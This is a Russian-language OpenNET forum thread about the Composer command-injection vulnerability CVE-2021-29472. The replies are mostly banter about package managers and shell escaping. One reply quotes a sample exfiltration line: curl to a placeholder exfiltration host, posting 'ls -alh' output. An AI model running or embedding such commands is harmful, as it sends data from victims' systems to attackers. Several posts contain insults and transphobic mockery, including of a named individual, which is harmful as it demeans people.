The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"Уязвимость в пакетном менеджере Composer, допускающая компрометацию PHP-репозитория Packagist"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в пакетном менеджере Composer, допускающая компрометацию PHP-репозитория Packagist"  +/
Сообщение от opennews (?), 03-Май-21, 09:24 
В менеджере зависимостей Composer выявлена критическая уязвимость (CVE-2021-29472), позволяющая выполнить произвольные команды в системе при обработке пакета со специально оформленным значением URL, определяющим адрес для загрузки исходных текстов. Проблема проявляется в компонентах GitDriver, SvnDriver и HgDriver, применяемых при использовании систем управления исходными текстами Git, Subversion и Mercurial. Уязвимость устранена в выпусках Composer 1.10.22 и 2.0.13...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=55065

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от Онаним (?), 03-Май-21, 09:24   +3 +/
Это не баг, это фича.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #2

2. Сообщение от Онаним (?), 03-Май-21, 09:25   +9 +/
(СtI/CtD = continous trojan integration / continuous trojan deployment)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

3. Сообщение от Аноним (3), 03-Май-21, 09:43   –4 +/
> ежемесячно обслуживающий более 1.4 миллиарда загрузок

Кто все эти люди? Индусы и китайцы? И это какой-то реально полезный софт?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #5, #24

4. Сообщение от Аноним (4), 03-Май-21, 09:44   –1 +/
Картина Репина: похапешники и безопасность
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #6, #28

5. Сообщение от Онаним (?), 03-Май-21, 09:52   +/
В основном это автоматические деплоеры, которым абсолютно пофиг, сколько там троянов внутри.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #9

6. Сообщение от Онаним (?), 03-Май-21, 09:53   +6 +/
Я бы сказал, девляпсы и безопасность.
Композер долго держался молодцом сравнительно со всякими npm.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4 Ответы: #11, #39

7. Сообщение от user90 (?), 03-Май-21, 09:59   +/
PornDriver
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #22

9. Сообщение от Анто769ним (?), 03-Май-21, 10:17   +1 +/
А деплоят они на локалхост, ага
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

10. Сообщение от Аноним (10), 03-Май-21, 10:35   –3 +/
Драйверы. На пхп.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #13

11. Сообщение от пох. (?), 03-Май-21, 10:50   +/
При комм....pear такого не было.

Потому что было как-то немодно тянуть в рот любую какашку с шитхаба. Но для обезьянок это было слишком сложно и замороченно.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #25, #32

12. Сообщение от Аноним (13), 03-Май-21, 10:54   +/
>> Аудит логов на серверах Packagist не выявил связанной с уязвимостью подозрительной активности.
>> Ошибка присутствует в коде с ноября 2011 года.

Прям с 2011 года весь аудит просмотрели?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #19

13. Сообщение от Аноним (13), 03-Май-21, 10:58   +5 +/
Дело не в PHP Такой же баг был бы на любом языке. Дело в подходе вызывать зависимости через командную строку. Это всегда дыряво. Нельзя гарантированно заэкранировать всё. С SQL это поняли и перестали пытаться экранировать. В мире linux где всё состоит из отдельных консольных программ, которые вызывают друг друга через командную строку это распространённая практика, от которой ещё долго будут отвыкать. Так что увы. Подобные баги будут повторяться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #20, #21

14. Сообщение от Анонин (?), 03-Май-21, 10:59   +/
Неуязвимых не бывает.
Ответить | Правка | Наверх | Cообщить модератору

15. Сообщение от Аноним (13), 03-Май-21, 11:00   +1 +/
>> В менеджере зависимостей Composer выявлена критическая уязвимость, позволяющая выполнить произвольные команды в системе при обработке

пакета

npm postinstall:  Уязвимость? о_О Фух, показалось...

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #18

16. Сообщение от Аноним (18), 03-Май-21, 11:03   –5 +/
Чето в голос.
Ответить | Правка | Наверх | Cообщить модератору

17. Сообщение от Dzen Python (ok), 03-Май-21, 11:07   –5 +/
Никогда такого не было и вот опять...
Ответить | Правка | Наверх | Cообщить модератору

18. Сообщение от Аноним (18), 03-Май-21, 11:07   +1 +/
Даже например deb пакеты такое умеют.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15

19. Сообщение от Аноним (19), 03-Май-21, 11:09   –1 +/
Грепнули логи, делов то
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12

20. Сообщение от Аноним (20), 03-Май-21, 11:11   –4 +/
Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13 Ответы: #26

21. Сообщение от Dzen Python (ok), 03-Май-21, 11:12   –2 +/
Альтернативы?
- Монолитный блоатварь, где все эти утилиты слеплены воедино? И страдать, если встроенный в код аналог grep'а нельзя заменить на ZZZgrep, умеющий фичу YYY, облегчающий в сценарии XXX работу, убирая много строк потенциально опасного шеллкода?
- RPC, который ломается точно так же?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #13 Ответы: #29

22. Сообщение от Dzen Python (ok), 03-Май-21, 11:13   –2 +/
PornHubDriver
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7

23. Сообщение от Аноним (23), 03-Май-21, 11:16   –5 +/
все эти composer, pip, npm для идиотов которые не знают что такое git submodules
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #27, #33

24. Сообщение от Аноним (24), 03-Май-21, 11:17   +3 +/
Куча биллингов написано на php, у меня на работе, у мужа на прошлой работе, на новой crm. Все они используют композер.
Все используют композер если программируют на php, это тоже самое что maven для java.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #41

25. Сообщение от Dzen Python (ok), 03-Май-21, 11:18   +/
Ну щито поделать-то? Обезьянья культурка "поколения гитхаба" стала самоподдерживающейся.
При ней главное СоС нарисовать и перед всякими ущербными жирофемками и "до чего дошел прогресс - у Коляна ПМС" не отсвечивать. А вот на код и на проверку либ времени не остается. Вот и пихают в проекты все что не попадя, наудачу надеясь, что экзерсис VasyanKolyanLGBT666 будет хоть немного рабочим.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

26. Сообщение от Аноним (24), 03-Май-21, 11:27   +6 +/
Просто нужно чтобы программы писали анонимные эксперты с opennet, а не каким-то вебмакакам. Анонимные эксперты на то и эксперты что у них руки не из задницы ростут.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20 Ответы: #34, #36, #42

27. Сообщение от Аноним (27), 03-Май-21, 11:28   +7 +/
лучше покажи мне дурачка который будет использовать git submodules вместо pip, таких даже среди клинических больных поискать придётся
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23 Ответы: #30, #45

28. Сообщение от Аноним (28), 03-Май-21, 11:32   –3 +/
Сделай лучше, фуле!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #4

29. Сообщение от Аноним (13), 03-Май-21, 11:38   +/
Не вчитывался подробно и не знаю особенностей php, но насколько я понимаю нечто подобное этому
https://github.com/libgit2/php-git решило бы проблему.
php-git2 is a PHP bindings to the libgit2 linkable C Git library.


Ответить | Правка | Наверх | Cообщить модератору
Родитель: #21

30. Сообщение от Аноним (23), 03-Май-21, 11:44   +1 +/
Любой вменяемый даже если и использует всю эту дрянь, то только чтобы скачать и тут же закрепить в submodules
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

31. Сообщение от YetAnotherOnanym (ok), 03-Май-21, 11:59   –3 +/
> curl http://exfiltration-host.tld --data “$(ls -alh)

Ыыыы... какая прелесть!
> в тот же день проблема была исправлена

Одного меня настораживает такая скорость?

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #49

32. Сообщение от имя_ (?), 03-Май-21, 12:10   +3 +/
при пир такого не было, только потому что сам пир был полухдохлый
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

33. Сообщение от hshhhhh (ok), 03-Май-21, 12:23   +4 +/
Все эти менеджеры зависимостей в линуксе для тех кто не осилил wget
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #23 Ответы: #35

34. Сообщение от Аноним (34), 03-Май-21, 12:34   +1 +/
Ну мааам
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26

35. Сообщение от YetAnotherOnanym (ok), 03-Май-21, 12:38   +4 +/
И не осилил собственную графовую БД для зависимостей. Слабаки!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33 Ответы: #37

36. Сообщение от Dzen Python (ok), 03-Май-21, 12:41   –1 +/
Да не вопрос, чувак. У тебя есть деньги на то, чтобы писали именно анонимные эксперты с опеннета? Со всеми проверками, тестированием, без постоянных сроков "надо было еще вчера" и без очешуительных правок в самый последний момент? Что такое, что мордочку-то скривил?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26 Ответы: #74, #75

37. Сообщение от пох. (?), 03-Май-21, 12:42   +/
Лошье! Только бумага и карандаш! Никаких БД!
Все зависимости должны быть отрисованы вручную и подписаны экспертом!

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35 Ответы: #48, #59

39. Сообщение от Lex (??), 03-Май-21, 12:56   –2 +/
Так и с npm'ом все в порядке..
Для понимания разницы, уязвимость нашли не в конечном пакете которых горы, а в самом пакетном менеджере [для пыха]
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6 Ответы: #69

41. Сообщение от Онаним (?), 03-Май-21, 13:47   +1 +/
"Все используют" - слишком распространённое заблуждение.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

42. Сообщение от Онаним (?), 03-Май-21, 13:49   –1 +/
Анонимные эксперты их собственно и пишут, просто в такие вот сводки обычно не попадают, потому что и область собственно распространения поуже "широкой макакопублики", и маразмов поменьше.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26

43. Сообщение от Анин (?), 03-Май-21, 14:16   –1 +/
Ребята из Миннесоты лютуют
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #51, #53

45. Сообщение от anonymous (??), 03-Май-21, 14:45   +/
Возможно вам понравится Go. Ибо он тупо переиспользует git для удалённых зависимостей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

48. Сообщение от Аноним (48), 03-Май-21, 15:20   +/
Нужно создать единое министерство зависимостей. И ввести ответственность за выдачу заведомо ложных зависимостей.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37

49. Сообщение от Аноним (49), 03-Май-21, 15:30   +1 +/
> Одного меня настораживает такая скорость?

Да.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #31

51. Сообщение от Dzen Python (ok), 03-Май-21, 16:16   –1 +/
Врешь. Это все Петров aka "Lovely_Bear" и Боширов aka "M$pwnER".
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43

53. Сообщение от Аноним (53), 03-Май-21, 16:23   +2 +/
>Ребята из Миннесоты лютуют

... Шапитофф и Литрофф ?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #43 Ответы: #54, #65

54. Сообщение от Аноним (48), 03-Май-21, 16:50   +/
Адитья Пакки вы только посмотрите на его честное, цветное, трансгендерное лицо https://adityapakki.github.io/ разве мог быть у него какой-то умысел? Он просто код писать не умеет просто он только на джаваскриат умел до коммита в ядро.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53 Ответы: #66

59. Сообщение от макпыф (ok), 03-Май-21, 17:50   +/
я предпочитаю хранить все в голове
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37 Ответы: #67, #72

65. Сообщение от Анин (?), 03-Май-21, 20:36   +/
Они же Попа и Табаров они же...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

66. Сообщение от Анин (?), 03-Май-21, 20:37   +/
Петров переборщил с автозагаром
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #54

67. Сообщение от hshhhhh (ok), 03-Май-21, 21:10   +/
всё ещё на слакваре?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #59 Ответы: #68

68. Сообщение от макпыф (ok), 03-Май-21, 21:13   +1 +/
> всё ещё на слакваре?

lfs

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #67

69. Сообщение от Онаним (?), 03-Май-21, 22:37   –1 +/
C npm было ещё хуже, в нём package-manager-agnostic дырень проявилась.
Которая задела не только npm, а все недопакетные недоменеджеры по касательной.
Потому что сама платформа изначально делана кривыми ногами.

CVE-2019-16776
CVE-2019-16777

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

72. Сообщение от пох. (?), 04-Май-21, 20:21   +1 +/
А что, готишно... Свиток с графом зависимостей, аккуратно свешивающийся из стоящего на полке черепа... товарищмайор, возможно, не совсем одобряют охоту за головами, но, с другой стороны, много ведь и не надо. А этим, из "Сети", пару голов ведь простили и отпустили... это ж не грибы на погибель мировому империализму растить, а просто пара подвернувшихся под руку неудачников...

Я бы штук семь, пожалуй, собрал, для красивого числа.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #59

74. Сообщение от Аноним (74), 05-Май-21, 08:36   +/
За деньги я и сама могу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36

75. Сообщение от Аноним (74), 05-Май-21, 09:18   +/
То есть вы предлагаете оплатить исправление уже исправленой уязвимости, оплатить неизвестно кому, кто с 99.9% вероятностью ничего сложного на php не писал, при этом с бесконечными сроками?

И вообще, сколько комитов вы уже сделали в composer? Покажите их.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36 Ответы: #76

76. Сообщение от Dzen Python (ok), 06-Май-21, 14:38   –1 +/
> Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.
> Кудох-тох-тох, эти анонимные эксперты с опеннета

Ты так и не понял, к чему это было написано, горе-разраб...

> И вообще, сколько комитов вы уже сделали в composer? Покажите их.

Разраб композера, залогинься. Все равно у меня длиннее - не в коммитах, а в нормальных сантиметрах.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #75 Ответы: #77

77. Сообщение от Аноним (74), 07-Май-21, 09:29   +/
Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми собрался меняться.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #76 Ответы: #78

78. Сообщение от Dzen Python (ok), 07-Май-21, 21:27   +/
> Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми
> собрался меняться.

Надо понимать, что ты не оставляешь надежды померяться коммитами?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #77

79. Сообщение от Аноним (79), 10-Май-21, 21:34   +/
>которые выполняются при помощи вызова "fromShellCommandline" с передачей аргументов командной строки.

Уж сколько раз твердили миру:

юзайте API || RPC || передавайте аргументы через конфиг-файл/трубу || реализуйте, еслине реализовано || GTFO.

Но there is a sucker born every minute, желающие и ведущиеся на лёгкие пути не мамонты и не вымрут никогда.

Ответить | Правка | Наверх | Cообщить модератору


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2021 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру